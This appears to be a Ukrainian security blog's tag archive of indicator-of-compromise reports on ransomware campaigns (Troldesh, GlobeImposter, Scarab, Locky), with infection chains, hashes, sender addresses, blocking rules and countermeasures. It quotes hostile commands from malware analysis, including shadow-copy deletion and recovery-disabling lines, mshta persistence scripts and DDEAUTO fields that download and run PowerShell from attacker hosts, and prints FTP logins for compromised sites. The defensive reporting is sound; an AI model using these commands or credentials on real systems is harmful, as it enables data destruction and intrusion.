Tag Archive | Ransomware

IOC_troldesh_121118

12/11/18 проходила розсилка шкідливого коду типу #troldesh (#shade) ransom
Метод доставки – js у оболонці zip.
Ступінь загрози – середній.

Аналітика:

  • Payload пакований
  • Використовує мережу Tor
  • Шифрує із затримкою 10-11 хв

Мережеві маркери:
– – – – – – – – – – – – – – – – – –

wscript.exe 2968 TCP s5.mizbandp.com http ESTABLISHED

rad3C919.tmp 2644 TCP localhost 49324 ESTABLISHED
rad3C919.tmp 2644 TCP localhost 49323 ESTABLISHED
rad3C919.tmp 2644 TCP tor.dizum.com https ESTABLISHED
rad3C919.tmp 2644 TCP tor.noreply.org https ESTABLISHED
rad3C919.tmp 2644 TCP 133-241-15-51.rev.cloud.scaleway.com 9001 ESTABLISHED
rad3C919.tmp 2644 TCP 154.35.32.5 443 SYN_SENT

rad3C919.tmp 2644 TCP 127.0.0.1 49324 ESTABLISHED
rad3C919.tmp 2644 TCP 127.0.0.1 49323 ESTABLISHED
rad3C919.tmp 2644 TCP 194.109.206.212 443 ESTABLISHED
rad3C919.tmp 2644 TCP 86.59.21.38 443 ESTABLISHED
rad3C919.tmp 2644 TCP 51.15.241.133 9001 ESTABLISHED
rad3C919.tmp 2644 TCP 5.9.151.241 4223 ESTABLISHED
rad3C919.tmp 2644 TCP faravahar.rabbani.jp https SYN_SENT

# # #

Повний перелік маркерів:
https://pastebin.com/1y8MpRZq

Контрзаходи:

  • Заборонити обробку WSH
  • Блокувати вихідний трафік для wscript та cscript
  • Заборонити на proxy завантаження додатків
  • Контролювати виклик cmd та інших системних додатків

Будьте уважні та обережні.

VR

Advertisements

IOC_troldesh_ransom_120918

(!) оновлено 13/09 – додані маркери (адреси, IP)

Доброго вечора, панове.

Сьогодні о другій половині дня проходила масова розсилка #Troldesh Ransomware.

Рівень загрози – високий!, для організацій, що прислухалися до наших попередніх рекомендацій – низький.

УВАГА! Зловмисники застосовують нову схему доставки.

Трохи аналітики:

  • Замість скриптів чи документів із приєднання цього разу розповсюджують через посилання на FTP
  • Після активації посилання жертва отримує SCR у оболонці ZIP
  • FTP джерела різні, контрольні суми архівів та SCR відрізняються (як мінімум 2 набори)
  • payload не кодований (!This program cannot be run in DOS mode.)
  • Зразок закріплюється в системі і шифрування починає із затримкою 10-15 хв
  • Затримка дозволяє обходити онлайн sandbox у яких час перевірки лімітований
  • Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload детектуються по GTI.

Схема атаки:

email > URL > FTP > ZIP > SCR > %temp% > Program Data\Windows\csrss.exe

Маркери IOC:

Приклади листів із посиланням на FTP джерела:

Теми листів:(оновлено 13/09)

Платіжна інформація 9/12/2018
інформація 6065341
інформація 2194379
інформація 2836783
інформація 1438232
ЗВIТ ПЛЮС

Адреси серверів з яких велась розсилка: (оновлено 13/09)

66.60.130.30
194.79.65.168
72.52.210.40
212.54.57.98
212.54.57.99
212.54.57.96

Скриньки з яких велася розсилка: (оновлено 13/09)

a.igor@arcor.de
silke.berg@arcor.de
murdock3@arcor.de
janinacaspers@arcor.de
kaierle@arcor.de
nadaf@arcor.de
clemo.w@arcor.de
elli.winter@arcor.de
neke81@arcor.de
denis.pielka@arcor.de
kasten.m@arcor.de
onkel-mike@arcor.de
oli-gerhard@arcor.de
ge-47se@arcor.de
ronnsen_g@arcor.de
stkroeger@arcor.de
fabian.schossau@arcor.de
franz216@arcor.de
okamerlog@arcor.de
chrissifuessel@arcor.de
sternentreiber@arcor.de
kd-53@arcor.de
thwagner@arcor.de
thomas.croy@arcor.de
j.zynda@arcor.de
stevesteel@arcor.de
arslanu@arcor.de
thwagner@arcor.de
cojahn@arcor.de
eadavid@arcor.de
philippklemm@arcor.de
roland.steurer@arcor.de
badneo@arcor.de
c.burbach@arcor.de
lars.sylvia@arcor.de
michappe2@arcor.de
johannes.steinbrecher@arcor.de
amiri111@arcor.de
vincentschwiedeps@arcor.de
oezdinc@arcor.de
varan@arcor.de
tobisperling@arcor.de
silke.berg@arcor.de
fabianahrens@arcor.de
andy-lieb@arcor.de
markxy2@arcor.de
tibe99@arcor.de
rosenstolz-100@arcor.de
rolf.kissel@arcor.de
raimondkiess@arcor.de
danielkempgen@arcor.de
vo-zi@arcor.de
dubidubidam@arcor.de
peterbartzsen@arcor.de
cjonientz@arcor.de
thomasvogt1@arcor.de
botbot@arcor.de
carstenconstabel@arcor.de
t.rick@arcor.de
c_ortiz@arcor.de
spamfelix@arcor.de
f.paul.pp@arcor.de
lars.sylvia@arcor.de
batyr4@arcor.de
cytomic@arcor.de
sebastian.strobl@arcor.de
robert.kagan@arcor.de
mario.muehlbach@arcor.de
a.igor@arcor.de
exog@arcor.de
derglagla@arcor.de
brharun@arcor.de
samed.yilmaz@arcor.de
bernhardschild1@arcor.de

ruim13@iol.pt
j.belem@iol.pt
jmaia79@iol.pt
angelo.c@iol.pt
neoteo@iol.pt
ampimenta@iol.pt
manuelmonteiro1974@iol.pt
siriusgrey@iol.pt
joaonn13@iol.pt
onapp@iol.pt
hugo_china@iol.pt
gtdesk@iol.pt
claudia_ferreir@iol.pt
filipe.t@iol.pt
fpimentel@iol.pt
nina_faria@iol.pt
ricksilva@iol.pt
jm3ze@iol.pt
tfcoelho@iol.pt
anakar1@iol.pt
ritaportela@iol.pt
ndsous@iol.pt
olga_rodrigues@iol.pt

j.morgan06@blueyonder.co.uk
lf012r2929@blueyonder.co.uk

tiff1pets@reliable-mail.com
bre90oplign@reliable-mail.com
bre90oplign@reliable-mail.com

qpecota@surewest.net
chairman@phoenixhc.co.uk

stolen@ghettojam.net
ian.p.hamilton@virgin.net
robiwahn@vodafone.de
engelchen1959@alice.de
p-morell@stofanet.dk
sara@woodsidestables.com

Адреси FTP: (оновлено 13/09)

f11p:\makoblue:london92@www.makoblue{.} com.au/public_html/2018/administrator/components/com_joomdoc/libraries/joomdoc/html/123-info001.zip
f11p:\freedomp:E8o1s8qpW5@freedompublishing{.} com.au/.trash/HTML/eoplata007.zip
f11p:\wontasti:85221064@ftp.wontastic{.} com/.htpasswds/public_html/0297_docs_tre_88.zip
f11p:\wontasti:85221064@ftp.wontastic{.} com/.trash/kitchen/wp-content/plugins/jetpack/modules/minileven/images/docs_spwo_374.zip
f11p:\j0elb:d3al4@users.tpg.com{.} au/selattyncottages/images/docs_spwo_374.zip
f11p:\mergit.com{.} au:a1d4nm143y@s46950.gridserver{.} com/domains/mergit.com{.} au/html/mergit/v00.01.13/tmp/Prvd_docs.zip
f11p:\wontasti:85221064@ftp.wontastic{.} com/.trash/kitchen/wp-content/plugins/meeting-scheduler-by-vcita/images/docs_spwo_374.zip
f11p:\sbbccom/#?-bWZ(Z_v3;@ftp.sbbc.com{.} au/.cagefs/var/cache/php-opcache/d949132ff7e5a1b34f35758ccce8ff12/home/sbbccom/public_html/mngd001.zip
f11p:\zvillanovaplaye:ATWaS1948@villanovaplayers{.} com/httpdocs/images/Prvd_docs.zip
f11p:\f189031:s3yn9bsk@cpfacilitation.com{.} au/webspace/httpdocs/wordpress/wp-content/plugins/contact-form-7/images/Prvd_docs.zip
f11p:\topuksto:zrhqh3j1ka4q19la@europa.servers.rbl-mer.misp.co{.} uk/mail/ukbargaincentral.com/steve.bartlett/.Sent/tmp/docs_spwo_374.zip
f11p:\dabaco:RqPid6!!!H0Iz5f@ftp.dabaco.com{.} au/public_html/administrator/components/com_admin/helpers/html/0297_docs_tre_88.zip
f11p:\topuksto:zrhqh3j1ka4q19la@ftp.ukbargaincentral{.} com/mail/ukbargaincentral.com/steve.bartlett/.Junk/tmp/Prvd_docs.zip
f11p:\topuksto:zrhqh3j1ka4q19la@europa.servers.rbl-mer.misp.co{.} uk/mail/.Drafts/tmp/docs_spwo_374.zip
f11p:\thestore:Soot777!@thestoreroomnsw.com{.} au/public_html/administrator/templates/khepri/html/123-info001.zip
f11p:\f189031:s3yn9bsk@cpfacilitation.com{.} au/webspace/httpdocs/wordpress/wp-content/plugins/contact-form-7/images/docs_spwo_374.zip
f11p:\etrain:*!?qfP#^QgU%@e-train.com{.} au/public_html/eoplata007.zip
f11p:\bimbella:q2h1q8a8n5@ftp.bimbellabeef.com{.} au/public_html/mngd001.zip

Архіви:

SHA-256 aa819503e6fa943c7802a6fd1d14b918fd33cf9ad97fba7140cdd7742e5192bb
File name Prvd_docs.zip
File size 853.95 KB

 

SHA-256 8b9b32c0965a707f26aaa9d8c316bba46d850ef768ebd1d9f2449325a311e15c
File name mngd001.zip
File size 853.77 KB

 

SCR файли:

SHA-256 270cbd6b5c344b952eb23b3383b30c4b97dc3f5b3e7702c61bb08c19e7f0320a
File name docs_spwo_374.scr
File size 911 KB

 

SHA-256 e7f43c2e20deb45a295eb7f3774c238e29a4a89e3d2487d9f852ada216052148
File name 0297_docs_tre_88.scr
File size 911 KB

Після запуску SCR дублює своє тіло у C:\ProgramData\Windows\csrss.exe

Закріплюється через HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem

Через 10-15 хв після активації розпочинає процес шифрування файлів, зашифровані файли отримують розширення .crypted000007

Цитата із вимог про викуп:

“Вaшu файлы былu зашuфрoвaны.
Чmобы pасшифpовamь иx, Вам неoбхoдuмо omправuть kод:
85F93484188BBACD2983|833|6|8
нa элeкmрoнный адрeс VladimirScherbinin1991@gmail.com .”

Мережева активність скомпрометованої системи:

194.109.206.212	www.khfpgbxlw5p6pzvklzug{.} com		Client Hello
86.59.21.38	www.j4pl75jorexd4e{.} com		Client Hello
192.3.169.210	www.33llfq{.} com		        Client Hello

0297_docs_tre_88.scr	194.109.206.212	443	ESTABLISHED										
0297_docs_tre_88.scr	192.3.169.210	443	ESTABLISHED										
0297_docs_tre_88.scr	86.18.115.93	9001	ESTABLISHED

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Обмеження FTP з’єднань для пересічних користувачів за білим списком джерел
  • Заборона довільного завантаження додатків для пересічних користувачів на рівні Web Proxy
  • Заборона створення та зчитування/запуску *.SCR та *.EXE з каталогів профілю користувача %appdata%
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Постраждалим(!):

ID Ransomware

No More Ransom

Інструкція по розшифровці (на свій ризик!)

Будьте уважні та обережні.

VR

IOC_GlobeImposter_211217

Доброго вечора, панове.

Вчора по обіді була зафіксована масова розсилка Globeimposter Ransomware.
Схожий зразок розсилали 30/11/17, проте тоді застосовували необфусковані VBS скрипти:


Цього разу метод доставки- обфускований JS. Шлях запису та ім’я файлу чітко задано в скрипті.
Payload не кодований.

Рівень загрози (для організацій котрі не вжили заходів щодо скриптів) – середній.

Для тих, хто прислухався до наших попередніх рекомендаційнизький.

Схема атаки:

email > Attach: 7z(.JS)  > WSCRIPT > GET /psndhFTwd??MYBlBYTYWjc=MYBlBYTYWjc > %temp%\MYBlBYTYWjc2.exe

Маркери IOC:

приманка у вигляді JS файлу яку жертва має сприйняти за зображення відсканованого документу:

File name IMG_20171221_345358418.js
SHA-256 d5977c433a0d03416d79e78cf765add480ebbc120a80b5d2d96254ca3c37b2e1
File size 14.54 KB

після запуску JS він обробляється процесом WSCript, який і виконує завантаження основного тіла:

“C:\Windows\System32\WScript.exe” “C:\Users\operator\Desktop\IMG_20171221_345358418.js”

File name psndhFTwd >> %temp%\MYBlBYTYWjc2.exe 
SHA-256 410efb1938ab06cf29acbcd24a3eca81c5d6d0c84778997adad1b5f0ecfb455c
File size 198.5 KB

після завантаження основне тіло записується в %temp% і запускається через виклик від імені процесу cmd

cmd.exe /c START “”  C:\tmp/MYBlBYTYWjc2.exeC:\tmp/MYBlBYTYWjc2.exe

C:\tmp/MYBlBYTYWjc2.exe

основне тіло після завантаження копіює себе у AppData і додає в перелік автозавантаження:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

BrowserUpdateCheck c:\users\operator\appdata\roaming\myblbytywjc2.exe

Шифрує одразу без підвищення прав користувача.

Зашифровані файли отримують розширення ..doc

# # # # # #

Додатково надаю спрацювання по правилам захисту доступу (блокування було деактивоване навмисне щоб отримати повні звіти)

VSE_AP_LogOnly

APM11\operator C:\WINDOWS\EXPLORER.EXE C:\USERS\OPERATOR\DESKTOP\IMG_20171221_345358418.JS User-defined Rules:_JS_pro_BLK Action blocked : Read
APM11\operator C:\WINDOWS\EXPLORER.EXE C:\USERS\OPERATOR\DESKTOP\IMG_20171221_345358418.JS User-defined Rules:_JS_pro_BLK Action blocked : Read
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE C:\USERS\OPERATOR\DESKTOP\IMG_20171221_345358418.JS User-defined Rules:_JS_pro_BLK Action blocked : Read
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE C:\TMP\TEMPORARY INTERNET FILES\COUNTERS.DAT Anti-spyware Maximum Protection:Prevent execution of scripts from the Temp folder Action blocked : Write
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Delete
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE Common Maximum Protection:Prevent HTTP communication 185.111.232.52:80
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\USERS\OPERATOR\APPDATA\ROAMING\MYBLBYTYWJC2.EXE User-defined Rules:_EXE_pro_BLK Action blocked : Create
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\BROWSERUPDATECHECK Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Blocked by Access Protection rule 
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\VSE\* Common Standard Protection:Prevent modification of McAfee files and settings Action blocked : Write
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\USERS\OPERATOR\APPDATA\ROAMING\MOZILLA\FIREFOX\* Common Standard Protection:Protect Mozilla & FireFox files and settings Action blocked : Write
APM11\operator C:\TMP\MYBLBYTYWJC2.EXE C:\TMP\TEMPORARY INTERNET FILES\CONTENT.IE5\CONTAINER.DAT Anti-virus Maximum Protection:Protect cached files from password and email address stealers Action blocked : Write

Мережеві IOC:

завантаження основного тіла:

185.111.232.52:80 www.seffafkartvizitim[.]com GET /psndhFTwd??MYBlBYTYWjc=MYBlBYTYWjc

Додаткові маркери за даними malware-traffic-analysis.net/

Сервери які розповсюджують основну частину:

h11p://www.g-v-s[.]ru/psndhFTwd?
h11p://www.homody[.]com/psndhFTwd?
h11p://www.mcwhorterdesign[.]com/psndhFTwd?
h11p://www.seffafkartvizitim[.]com/psndhFTwd?
h11p://www.topanswertips[.]info/psndhFTwd?
h11p://www.tuminsaat[.]com/psndhFTwd?
h11p://www.rdpassistance[.]com/PuaneYDG?
h11p://www.rutor[.]space/PuaneYDG?
h11p://www.sclionionescu[.]ro/PuaneYDG?
h11p://www.servicetrade24[.]ru/PuaneYDG?
h11p://www.soslavanderia[.]com.co/PuaneYDG?
h11p://www.vseteplo[.]by/PuaneYDG?

Теми листів:

 Subject: Emailing: IMG_20171221_970542999, IMG_20171221_105610661, IMG_20171221_330199554_HDR
 Subject: Emailing: IMG_20171221_680272343, IMG_20171221_209718394, IMG_20171221_691812068_HDR
 Subject: Emailing: IMG_20171221_855525309, IMG_20171221_558874225, IMG_20171221_633843547_HDR
 Subject: Emailing: IMG_20171221_093043189, IMG_20171221_414525016, IMG_20171221_777953000_HDR
 Subject: Emailing: IMG_20171221_582764807, IMG_20171221_829866923, IMG_20171221_194629228_HDR
 Subject: Emailing: IMG_20171221_501005613, IMG_20171221_798070330, IMG_20171221_271932520_HDR
 Subject: Emailing: IMG_20171221_870284477, IMG_20171221_993512867, IMG_20171221_458229113_HDR
 Subject: Emailing: IMG_20171222_924030478, IMG_20171222_104259967, IMG_20171222_350843050_HDR
 Subject: Emailing: IMG_20171221_167023012, IMG_20171221_911069898, IMG_20171221_259887793_HDR
 Subject: Emailing: IMG_20171222_358078220, IMG_20171222_235116613, IMG_20171222_702416975_HDR

Контрольні суми приєднань:

 ca75b8a86fed3a725a2eaae1a37ff1277ec267818d53a963d4ae1c4e7573859a - IMG_20171221_312327133.js
 3e0a6f75b7a6bd527d26de7c23d76fada787e02a496fb2fb99207217385fb15a - IMG_20171221_498152824.js
 a9929327b937efcb1a0d39bd6bddaaa450629c3d74cde81c7167feb4f33c794d - IMG_20171221_499864685.js
 e349e7c6d04157dac849967da08033b685730f07f382f90a693943296fccd5bb - IMG_20171221_508871502.js
 2570fea4e10fb51e559d0d2dc9714837e25870b5e5413e1931a5c8cf39ba6b1c - IMG_20171221_555275412.js
 c01a8ef796ad0d79c2e0d08a5da677242da0b4d24743124c134e6f7f4992bb7c - IMG_20171221_698827418.js
 5314187cb13387df3759afa81fe0c4d97c4e35e2717e0000db3181ab1bde61a5 - IMG_20171221_725213643.js
 063b9d113fc153dfa153efee1d496b72230c89ca2623cca69ab6c7ecefde0559 - IMG_20171221_797605201.js
 4b3c49b00a5c40af3cad9ec02bc96baf61edd0f645fb2cb177f20bfb6f3f71a2 - IMG_20171221_836062519.js
 57e6d4f037eecc0af58adc58fe7c4b43efd96f05c321b9025d53810131bdd5fd - IMG_20171221_968347573.js

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона створення скриптових файлів

Name: _script_BLK
Action: Block, Report
Process to include: * 
Processes to exclude: -
Subrule: _script_files
Files
+ Read  
+ Create
Targets Include: 
**\Users\*\**\*.JS
**\Users\*\**\*.JSE
**\Users\*\**\*.VBS
**\Users\*\**\*.WSF

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Create
+ Read
+ Execute

Контрзаходи:
  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування завантаження запусних файлів (payload не шифрований)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Блокування доступу до мережі Інтернет для процесу WSCript (варіант 1й)
  • Заборона створення та зчитування/запуску *.EXE та скриптів з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Scarab_231117

Доброго дня, панове.

Звіт стосується розсилок Scarab Ransomware, які відбувалися на минулому тижні. Публікую для академічного розгляду оскільки:

Рівень загрози – нижче середнього. Для тих, хто прислухався до моїх рекомендаційнизький.

Звернень по цьому типу мені не надходило, а кім того, технічно механізм інфікування Scarab не відрізняється від інших (Locky, Cerber), які я вже розглядав.

Проте зважаючи на те, яку увагу (з подачі Кіберполіції) ЗМІ приділили розсилкам саме цього зразка – вирішив усе ж таки його розібрати.

Не без того, щоб вкотре нагадати вам прості та дієві методи захисту.

Трохи аналітики:

  • Шифрування стійке. На даний момент способу відновити файли – не знайдено
  • Факти інфікування даним класом шкідливого коду говорять про низький рівень обізнаності
  • Scarab спричинив багато галасу, бо на відміну від Locky, він шифрує одразу без перевірки умов, ще раз – Scarab шифрує завжди там, де був запущений
  • А це значить, що жертви Scarab ігнорували попередні інциденти тому що, розсилки з Locky не призводили до шифрування
  • Метод доставки – масовий, неперсоніфікований, нелокалізований, низькоякісний фішинг типу “відскановані документи”
  • Тип приманки – необфусковані VBS скрипти в архівах 7zip
  • Скрипти містять від 2 до 3 посилань на завантаження основної частини
  • Активація та шифрування відбуваються з правами користувача і можуть проходити без мережевих з’єднань (offline)
  • Ім’я основної частини чітко задане кодом скрипту і не змінюється
  • Перед початком шифрування зразок намагається видалити Shadow Copy, якщо права не надавати – шифрування продовжиться, просто без видалення тіньових копій

Схема атаки:

email > Attach 7z (VBS) > WSCript > GET JHgd476? > %temp%\VJMAQASU.exe

Маркери IOC:

приклади листів:

один із скриптів-приманок:

File name image2017-11-22-5379282.vbs
SHA-256 fd072a6c2fe9187f799a27e21c27fc67dd2f145ccbc0faa917f37469d0d26974
File size 3.8 KB

містить три посилання на завантаження основної частини:

krapivec = Array("miamirecyclecenters[.]com/JHgd476?","pamplonarecados[.]com/JHgd476?","hard-grooves[.]com/JHgd476?")

Останнє – досі активно і на звернення видає основну частину:

File name JHgd476  >> %temp%\VJMAQASU.exe
SHA-256 7a60e9f0c00bcf5791d898c84c26f484b4c671223f6121dc3608970d8bf8fe4f
File size 356.5 KB

Приклад запуску без надання привілеїв:

Приклад запуску із наданням привілеїв через UAC:

Запуск скрипту приводить до завантаження основної частини за шляхом %temp%\VJMAQASU.exe

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\image2017-11-22-5379282.vbs" 
"C:\Windows\System32\cmd.exe" /c call "C:\tmp\VJMAQASU.exe"
"C:\tmp\VJMAQASU.exe"

Після запуску Scarab через cmd.exe копіює своє тіло у %AppData%\Roaming\sevnz.exe

Та намагається отримати підвищення привілеїв для видалення тіньових копій (UAC)

Якщо йому це вдається, він копіює своє тіло ще раз у %AppData%\Roaming але вже для адміністративного облікового запису

"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\operator\AppData\Roaming\sevnz.exe"
"C:\tmp\VJMAQASU.exe" runas
"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\support\AppData\Roaming\sevnz.exe"
"C:\Users\support\AppData\Roaming\sevnz.exe"

Далі через mshta за допомогою javascript команд Scarab додає в автозавантаження посилання на замітку про викуп і ініціює видалення тіньових копій:

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\uSjBVNE',i);}catch(e){}},10);"
mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\STYRX\\OCDPR'));close();"
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
vssadmin  Delete Shadows /All /Quiet
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

В фоні відбувається шифрування через послідовний перезапис файлів процесом AppData\Roaming\sevnz.exe

По завершенню шифрування Scarab відкриває файл із заміткою про викуп та ініціює видалення свого тіла (за обома шляхами – temp та appdata)

C:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
notepad.exe  "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('VJMAQASU.exe');close()}catch(e){}},10);"

Зашифровані файли отримують розширення .[suupport(@)protonmail[.]com].scarab

Шифрування невеликої кількості документів зайняло ~5-7 хвилин

Частина замітки про викуп:

__________________________________________________________________________________________________
|                                                                                                  |
|                 *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS ***                 |
|__________________________________________________________________________________________________|

Your files are now encrypted!

-----BEGIN PERSONAL IDENTIFIER-----
123oin123njnjndoiqn2oenq2oindiqndkqndknwqkndkawndkawndkl
-----END PERSONAL IDENTIFIER-----

All your files have been encrypted due to a security problem with your PC.

Мережеві IOC:

завантаження основного тіла Scarab:

5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1 
98.124.251.75:80      HTTP 375 atlantarecyclingcenters[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
98.124.251.75:80      HTTP 371 miamirecyclecenters[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.173.111:80      HTTP 364 hard-grooves[.]com GET /JHgd476? HTTP/1.1 (досі активний)

відправка даних про Public IP

88.99.66.31:80       HTTP 101 iplogger[.]co GET /18RtV6.jpg HTTP/1.1 - передача через cookie

Що можна було зробити аби уникнути інфікування ?

  1. Фільтр скриптових приєднань (VBS, JS, JSE, WSF..)
  2. Заборона завантаження скриптових та запусних файлів (payload у Scarab не шифрований)
  3. Заборона створення VBS та EXE в каталозі профілю користувача (приклади правил наведені нижче)
  4. Деактивація механізму Windows Scritp Host (другий варіант)
  5. Або блокування вихідного трафіку для процесів WSCritp та CSCript (перший варіант)

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Заборона створення скриптових файлів (увага! приклад тільки для VBS, рекомендується продублювати правила для JS, JSE, WSF)

Name: _VBS_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.VBS
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/створення/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

DDE_Locky_311017

Доброго дня, панове.

Вчора вночі була зафіксована чергова спроба доставки Locky Ransomware через документи з DDE.

Схему активації я вже розбирав детально тому зосередимося на маркерах та контрзаходах.

Рівень загрози – усе ще високий, але не через складність атаки, а через те, що ще не всі організації вжили заходів щодо блокування DDE.

Для організацій, що прислухалися до моїх попередніх рекомендацій , рівень загрози – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що обидва payload вже детектуєються по GTI.

Нагадую, що механізм DDE може бути використаний для запуску команд не лише в Word та Excel а й у Outlook.

Користувачам McAfee VSE/ENS раджу ще раз ознайомитися із простими правилами по блокуванню DDE.

Схема атаки:

email > .doc (DDE) > запитання1? > запитання2? > CMD > powershell > GET URL list > GET payload1 > %temp%\*1.exe > GET encoded payload2 > %temp%\*2.exe

Маркери IOC:

Обидва файли що були передані на аналіз відносяться до однієї кампанії, посилання з обох ведуть на один і той самий список URL для завантаження payload1

Документ#1

File name Invoice 081839882 10.31.2017
File size 16.74 KB
SHA-256 7a81c498fa2c4bead2792bfa636d2c32f9f630b92c0aa1cceacfb5403aeb0909

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\localesynavesalquiler[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

Документ#2

File name Invoice 091312820 10.31.2017
File size 16.73 KB
SHA-256 66c1be89ca96319d92600aefeecade28ecf312682d94846032ad8fa3635a1575

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\lopezfranco[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

